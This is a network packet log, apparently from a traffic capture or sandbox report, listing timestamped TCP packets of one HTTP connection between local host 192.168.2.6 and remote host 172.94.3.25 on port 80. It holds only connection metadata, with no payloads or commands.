Sep 25, 2024 16:03:56.659112930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.659267902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659308910 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.659322023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659333944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659364939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.659373045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659392118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.659423113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.708873987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.708890915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.708904028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.708918095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.708931923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.708970070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.709017038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736248016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736260891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736272097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736284018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736309052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736330986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736341953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736360073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736371040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736375093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736402035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736813068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736866951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736877918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736888885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736901045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736908913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736923933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.736946106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.736958027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737041950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737104893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737114906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737128019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737140894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737148046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737171888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737281084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737289906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737315893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737371922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737381935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737400055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737411976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737417936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737421036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737432003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:56.737437963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.737459898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:56.780591965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653029919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653058052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653072119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653083086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653095961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653106928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653117895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653131962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653182030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653247118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653255939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653278112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653289080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653321028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653350115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653359890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653372049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653383017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653390884 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653417110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653564930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653609037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653647900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653659105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653670073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653683901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653692007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653721094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653723955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653734922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653767109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653785944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653796911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653808117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653820992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.653825045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.653852940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.731934071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.731966019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.731976986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.731990099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732011080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732022047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732027054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732033968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732038021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732043982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732049942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732055902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732078075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.732150078 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.732153893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732165098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732176065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732187033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732211113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.732217073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732227087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732239008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732242107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.732250929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732261896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.732296944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.732307911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809216022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809241056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809253931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809267044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809348106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809457064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809468031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809485912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809505939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809505939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809518099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809529066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809539080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809540033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809571981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809828997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809840918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809854031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809860945 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809865952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809878111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809887886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809906006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.809914112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809925079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809937954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.809966087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.810302973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.810313940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.810336113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.810338974 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.810365915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.819565058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.819603920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.819659948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887270927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887305021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887320042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887331963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887345076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887353897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887357950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887382030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887392044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887403965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887414932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887422085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887427092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887439966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887447119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887468100 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887484074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887496948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887520075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887689114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887722969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887726068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887736082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887770891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.887923956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887937069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887955904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.887974024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.888210058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888221979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888241053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888251066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.888258934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888272047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888278961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.888283968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888295889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888303995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.888330936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.888422966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888434887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888448000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.888474941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.936794043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965450048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965481997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965496063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965507984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965522051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965532064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965536118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965573072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965591908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965603113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965622902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965635061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965660095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965673923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965708017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965781927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965862989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965876102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965897083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965908051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.965941906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.965977907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966021061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966032028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966043949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966058016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966074944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966197014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966207027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966217041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966231108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966237068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966244936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966264963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966265917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966278076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966299057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966762066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966773033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966784954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:58.966799021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:58.966818094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.043509960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043529034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043544054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043589115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.043659925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043673038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043693066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043700933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.043725014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.043885946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043900013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.043932915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044059038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044217110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044229031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044241905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044249058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044253111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044274092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044275045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044290066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044312000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044373989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044389009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044400930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044414043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044424057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044430971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044435024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044446945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044459105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044472933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044477940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044493914 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044537067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044548988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044569969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.044595003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044606924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.044631958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.093023062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.121685982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121727943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121740103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121752977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121763945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121776104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121788025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121802092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.121840954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.121896982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122267962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122289896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122303963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122325897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122390985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122401953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122415066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122423887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122426987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122437000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122452021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122469902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122503042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122566938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122576952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122587919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122600079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122617006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.122669935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122711897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122724056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.122745991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.172416925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.172436953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.172561884 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.199851990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199893951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199913979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199927092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199937105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199949980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199959993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199973106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199987888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.199999094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200011015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200022936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200054884 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200155020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:59.200191021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:59.200206995 CEST	80	49715	172.94.3.25	192.168.2.6
